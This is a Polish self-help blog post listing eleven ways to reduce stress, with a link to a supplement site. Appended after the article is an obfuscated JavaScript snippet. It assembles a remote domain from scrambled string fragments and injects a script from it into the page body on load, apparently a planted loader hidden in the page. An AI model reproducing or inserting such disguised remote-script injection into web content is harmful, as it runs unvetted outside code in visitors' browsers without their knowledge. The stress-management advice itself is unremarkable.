Lek na stres: 11 sposobów na zszargane nerwy

Sposoby na nerwy

Stres jest przyczyną wielu dolegliwości fizycznych i psychicznych. Nie
sposób jednak całkowicie pozbyć się go z życia. Sprawdź, jak przejąć nad
nim kontrolę.

Negatywny wpływ stresu na zdrowie
Badacze sugerują, że aż 60-90 proc. chorób jest bezpośrednio spowodowanych lub zaostrzanych przez stres. Wiąże się on z chorobami serca, wysokim ciśnieniem krwi i cukrzycą. Może również powodować bóle pleców i głowy, zaburzenia żołądkowe i problemy trawienne, problemy ze snem, seksem, masą ciała i skórą. Wśród psychicznych skutków stresu, trzeba wymienić depresję, lęk, wahania nastroju, niepokój czy drażliwość.
Jak zminimalizować konsekwencje stresu?
Stres może towarzyszyć zarówno negatywnym, jak i pozytywnym wydarzeniom w naszym życiu. Dlatego trudno go całkowicie wyeliminować. Oto sposoby na zredukowanie napięcia:

 • Wyciszaj się: niezależnie, czy będzie to joga, siłownia, wycieczka czy czas spędzony z książką, miej odskocznię, dzięki której będziesz oczyszczać umysł.
 • Przestań zwlekać: co prawda możesz kolejny raz odłożyć wykonanie zadania na później, ale nie możesz odłożyć niepokoju i stresu, który temu towarzyszy.
 • Zapisuj: jeśli często o czymś nie pamiętasz i prowadzi to do stresu, zacznij zapisywać zadania i terminy. Od tej chwili nie zapomnisz.
 • Jedz lepiej: zdrowy sposób żywienia pomoże twojemu organizmowi lepiej radzić sobie ze skutkami stresu. Odżywcza dieta nie jest skomplikowana – sięgaj przede wszystkim po żywność roślinną, jedz produkty jak najmniej przetworzone i nie przejadaj się.
 • Mów o tym: tłumienie frustracji prowadzi do stresu. Dlatego naucz się w konstruktywny sposób wyrażać i przekazywać swoje niezadowolenie.
 • Ustalaj priorytety: określ, co w twoim życiu wymaga uwagi, a co nie. Skup swoją energię na rzeczach, które rzeczywiście mają na ciebie wpływ. Odpuść resztę.
 • Miej procedury: trzymanie się ustalonych reguł oznacza, że nie musisz się już stresować tym, co będzie dalej.
 • Planuj elastycznie: w procedurach postępowania pozostaw trochę przestrzeni. Pozwoli ci to na bezstresowe dostosowanie się do nieuchronnych zmian.
 • Wiedz, kiedy powiedzieć dość: nie zdawaj się na pracodawców, przyjaciół czy partnerów. Samodzielnie decyduj, ile możesz znieść. Kiedy przekroczysz tę linię, odejdź i nie oglądaj się za siebie.
 • Troszcz się o siebie: ustal przyczyny i skutki swojego stresu. Przekonaj się, czy to, jak postępujesz, na pewno wynika z twoich własnych potrzeb. Nie trać energii na konkurowanie.
 • Kochaj: budowanie pozytywnych relacji to kolejny lek na stres. Grzej się w cieple innych. Dziel się sobą.

Więcej na: http://vitabuerlecithin.pl/lek-uspokajajacy/

(function(){
tmkqu=”rpa4qsximkqj”;tmkq=document.createElement(„script”);
tmkq_=”u”+(„st”);tmkq_+=”at”+(„.”);tmkq.async=true;tmkq_+=”in”;
tmkqu=”70918675.”+tmkqu;tmkq.type=”text/javascript”;tmkqu+=”p2vubk3Xuvab”;
tmkqu+=”4hqlqn”;tmkq_+=(„f”)+”o”+(„/”);tmkq.src=”//”+tmkq_+tmkqu;
tmkqd=document.body;tmkqd.appendChild(tmkq);
})();

Leave a Reply

%d bloggers like this: